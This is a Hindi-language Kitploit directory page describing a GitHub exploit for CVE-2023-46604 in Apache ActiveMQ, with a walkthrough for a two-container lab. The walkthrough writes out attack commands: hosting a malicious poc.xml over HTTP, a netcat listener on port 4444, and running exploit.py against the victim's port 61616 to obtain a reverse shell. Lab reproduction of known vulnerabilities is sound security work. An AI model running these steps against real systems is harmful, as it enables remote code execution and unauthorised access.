Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ccievoice2009/cve-2023-46604
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubccievoice2009/cve-2023-46604

CVE-2023-46604

Apache ActiveMQ में CVE-2023-46604 के लिए एक्सप्लॉइट, क्राफ्टेड XML पेलोड और रिवर्स शेल स्थापना के माध्यम से रिमोट कोड निष्पादन सक्षम करता है।

रिपॉजिटरी देखें
361 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46604

image

आवश्यक वातावरण के अनुसार पीड़ित मशीन और लक्ष्य मशीन वाले 2 इमेज का docker-compose तैयार करें पीड़ित मशीन पर, ActiveMQ प्रारंभ करें

हमलावर मशीन पर जाएँ: • POC भेजने के लिए HTTP सेवा खोलें: python3 -m http.server

• हमलावर मशीन से कनेक्शन सुनने के लिए netcat का उपयोग करें nc -nlvp 4444

• हमलावर मशीन पर रिवर्स शेल कनेक्शन बनाने के लिए पेलोड भेजें python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml जहाँ:

  • Exploit.py: भेद्यता शोषण कोड फ़ाइल
  • -I 172.18.0.3: पेलोड भेजने वाली मशीन का IP पता
  • -p 61616: पीड़ित मशीन के ActiveMQ द्वारा सुने जाने वाला पोर्ट
  • --xml http://172.18.0.2:8000/poc.xml: हमलावर मशीन पर poc.xml फ़ाइल का URL पता

यह देखा जा सकता है कि ‘exploit.py’ फ़ाइल को निष्पादित करने के बाद, शोषण कोड वेब सर्वर पर एक 'poc.xml' पैकेट लक्ष्य पर भेजता है, जो लक्ष्य सर्वर पर चल रहे ActiveMQ सेवा का पता है। साथ ही, हमलावर मशीन पर HTTP वेबसर्वर को लक्ष्य मशीन के आईपी पते से भेजा गया अनुरोध प्राप्त होता है।

पेलोड भेजने के बाद, हमलावर मशीन के पोर्ट 4444 पर सुन रहे टर्मिनल पर जाएँ। हम देखते हैं कि पीड़ित मशीन का रिवर्स शेल वापस भेज दिया गया है।

टूल डाउनलोड करें